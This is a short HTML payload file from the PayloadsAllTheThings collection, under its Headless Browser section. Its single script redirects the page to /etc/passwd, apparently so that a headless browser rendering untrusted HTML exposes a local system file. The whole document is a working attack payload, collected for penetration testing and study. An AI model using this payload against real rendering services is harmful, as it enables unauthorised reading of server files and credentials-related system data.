PayloadsAllTheThings/Headless Browser/files/window_location_js.html
2024-05-31 00:07:21 +02:00

7 lines
114 B
HTML

<html>
<body>
<script>
window.location="/etc/passwd"
</script>
</body>
</html>